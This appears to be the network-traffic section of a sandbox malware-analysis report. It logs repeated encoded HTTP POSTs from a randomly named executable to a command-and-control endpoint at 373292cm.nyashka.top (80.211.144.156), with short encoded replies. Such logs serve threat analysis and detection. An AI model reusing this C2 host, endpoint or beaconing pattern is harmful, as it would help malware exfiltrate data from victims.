                                    Data Ascii: _W\VTBT^[_ZQYSXRW]]_W[SUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,3"$ 3!X*+?.)^<>;# !<(9<#02;>&F$.Y/5
                                    Aug 25, 2024 15:46:51.210019112 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:51.351440907 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    81 | 192.168.2.8 | 49794 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:51.483489037 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:51.839732885 CEST | 2544 | OUT | Data Raw: 5a 57 5c 55 54 42 54 5d 5b 5f 5a 51 59 51 58 5e 57 51 5d 5b 57 5f 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZW\UTBT][_ZQYQX^WQ][W_SYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.8/@#= 6><X+.5+.'[#+V#/+9$ #*/>&F$.Y/=
                                    Aug 25, 2024 15:46:52.148564100 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:52.350153923 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    82 | 192.168.2.8 | 49795 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:52.482831955 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:52.941916943 CEST | 2544 | OUT | Data Raw: 5f 54 5c 50 54 43 54 50 5b 5f 5a 51 59 54 58 55 57 51 5d 5f 57 58 53 5a 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _T\PTCTP[_ZQYTXUWQ]_WXSZYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,U;5=4]"0X),^((7??R43(9873)\8&F$.Y/)
                                    Aug 25, 2024 15:46:53.147959948 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:53.281999111 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:52 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    83 | 192.168.2.8 | 49796 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:53.403580904 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:53.764377117 CEST | 2544 | OUT | Data Raw: 5f 56 5c 55 51 44 54 58 5b 5f 5a 51 59 56 58 54 57 5b 5d 53 57 59 53 5a 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _V\UQDTX[_ZQYVXTW[]SWYSZYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.],;D#>< :)[ ]>>=^?>; <7Q4" (:#_"35^,>&F$.Y/!
                                    Aug 25, 2024 15:46:54.091018915 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:54.221483946 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    84 | 192.168.2.8 | 49797 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:54.341687918 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:54.699183941 CEST | 2544 | OUT | Data Raw: 5f 55 5c 5f 54 46 51 5b 5b 5f 5a 51 59 51 58 55 57 5b 5d 59 57 58 53 5b 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _U\_TFQ[[_ZQYQXUW[]YWXS[YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q..3#A"['435*[4_?X&+[$ #R '(_#] %Y,>&F$.Y/=
                                    Aug 25, 2024 15:46:55.007900000 CEST | 25 | IN | HTTP/1.1 100 Continue


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    85 | 192.168.2.8 | 49798 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:55.112500906 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:55.467030048 CEST | 1840 | OUT | Data Raw: 5a 55 59 53 51 42 54 5c 5b 5f 5a 51 59 53 58 51 57 59 5d 53 57 58 53 5d 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZUYSQBT\[_ZQYSXQWY]SWXS]YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-/0,"$739*=+:(>7Y7<#P#$Q<:+4V6/&F$.Y/5
                                    Aug 25, 2024 15:46:55.787245989 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:56.013691902 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 25 0a 3d 25 32 5c 32 3b 28 53 30 0d 2a 52 2b 3d 3b 59 3e 3d 3a 06 24 06 21 15 31 00 33 0f 27 15 29 11 3f 58 2a 19 32 06 2f 11 3a 1e 2b 5d 0c 13 22 59 20 5c 2a 58 26 2c 28 5b 3d 16 3f 18 20 2c 0b 02 3c 3a 0c 0d 3f 2f 2b 06 3c 5f 34 04 2b 14 22 53 3b 01 25 5d 3a 30 22 13 34 14 2b 52 0d 11 24 57 2b 13 0c 0c 29 58 3b 58 35 16 2f 5a 27 04 2e 1d 26 31 32 56 24 00 3f 02 25 0c 32 0f 27 32 2a 0d 32 05 32 12 27 2c 35 1f 36 22 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: %=%2\2;(S0*R+=;Y>=:$!13')?X*2/:+]"Y \*X&,([=? ,<:?/+<_4+"S;%]:0"4+R$W+)X;X5/Z'.&12V$?%2'2*22',56"#T,"W3UV


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    86 | 192.168.2.8 | 49799 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:55.237709999 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:55.603245974 CEST | 2544 | OUT | Data Raw: 5a 51 5c 54 51 43 51 5d 5b 5f 5a 51 59 54 58 5e 57 50 5d 59 57 50 53 5d 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZQ\TQCQ][_ZQYTX^WP]YWPS]YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q./#"=\" 2*-^>>%+[7"<S W,?4 5^,.&F$.Y/)
                                    Aug 25, 2024 15:46:55.907500029 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:56.038980007 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    87 | 192.168.2.8 | 49800 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:56.169519901 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:56.527101994 CEST | 2544 | OUT | Data Raw: 5a 51 59 52 54 49 54 5e 5b 5f 5a 51 59 50 58 52 57 59 5d 59 57 5a 53 5a 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZQYRTIT^[_ZQYPXRWY]YWZSZYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.].0$"?#=]==0<>:< ,#"?+']40!;.&F$.Y/
                                    Aug 25, 2024 15:46:56.854744911 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:56.990062952 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    88 | 192.168.2.8 | 49801 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:57.127860069 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:57.483325005 CEST | 2544 | OUT | Data Raw: 5f 5d 5c 51 54 48 51 5b 5b 5f 5a 51 59 54 58 5f 57 50 5d 5f 57 5c 53 5e 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _]\QTHQ[[_ZQYTX_WP]_W\S^YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q._/(">;73!>>7+6+;X",,#W8R+#/&F$.Y/)
                                    Aug 25, 2024 15:46:57.793273926 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:57.925843954 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    89 | 192.168.2.8 | 49802 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:58.335057974 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:58.683501959 CEST | 2544 | OUT | Data Raw: 5f 54 59 55 51 42 54 51 5b 5f 5a 51 59 53 58 56 57 5f 5d 5c 57 5a 53 5e 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _TYUQBTQ[_ZQYSXVW_]\WZS^YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,3!7 #)Z)=++([;7?7P#W <?]73)Y/>&F$.Y/5
                                    Aug 25, 2024 15:46:59.031261921 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:59.228451967 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    90 | 192.168.2.8 | 49803 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:59.361831903 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:59.715034008 CEST | 2544 | OUT | Data Raw: 5f 56 5c 52 51 44 51 59 5b 5f 5a 51 59 5f 58 52 57 51 5d 58 57 5e 53 5e 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _V\RQDQY[_ZQY_XRWQ]XW^S^YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-;3 ![8]40X)(&)- ,R '?*;4*,.&F$.Y/
                                    Aug 25, 2024 15:47:00.073618889 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:47:00.271404028 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:59 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    91 | 192.168.2.8 | 49804 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:47:00.406059980 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:47:00.792124987 CEST | 2544 | OUT | Data Raw: 5f 53 5c 57 54 49 54 5f 5b 5f 5a 51 59 52 58 54 57 58 5d 5a 57 5c 53 5e 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _S\WTIT_[_ZQYRXTWX]ZW\S^YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.Y,+!(\ 3%==0>-*(?#Z?7??*( 09Y;>&F$.Y/1


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    92 | 192.168.2.8 | 49805 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:47:01.033205032 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1848
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:47:01.386477947 CEST | 1848 | OUT | Data Raw: 5a 51 5c 57 54 40 51 59 5b 5f 5a 51 59 57 58 50 57 51 5d 5c 57 50 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZQ\WT@QY[_ZQYWXPWQ]\WPS\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.,U;D"47#*>= (%+=(4<7Q#W8W+)X"0>/>&F$.Y/
                                    Aug 25, 2024 15:47:01.704473972 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:47:01.907390118 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:47:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 55 2a 0b 2a 5c 25 2b 33 0c 30 20 22 52 2b 2d 37 58 2b 3d 25 5f 24 16 0b 59 32 3d 23 0f 26 38 22 03 28 00 2a 1a 32 06 27 1e 3a 1e 2b 5d 0c 13 22 5f 20 5c 2a 1e 24 3c 3c 13 3e 28 0d 18 35 02 29 00 2b 04 21 16 3f 2c 20 1d 3c 39 02 02 2b 2a 0f 0e 3b 06 2e 02 2e 33 39 0f 34 3e 2b 52 0d 11 27 0e 2b 03 3e 0f 28 3e 37 5f 36 06 01 12 24 3d 21 0d 31 21 31 0f 27 17 01 00 26 1c 1b 56 24 1f 39 1f 26 3b 0c 12 25 2f 07 54 35 08 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &U**\%+30 "R+-7X+=%_$Y2=#&8"(*2':+]"_ \*$<<>(5)+!?, <9+*;..394>+R'+>(>7_6$=!1!1'&V$9&;%/T5#T,"W3UV


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    93 | 192.168.2.8 | 49806 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:47:01.152983904 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:47:01.511677027 CEST | 2544 | OUT | Data Raw: 5f 56 59 57 51 44 54 5d 5b 5f 5a 51 59 53 58 55 57 5b 5d 53 57 5a 53 58 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
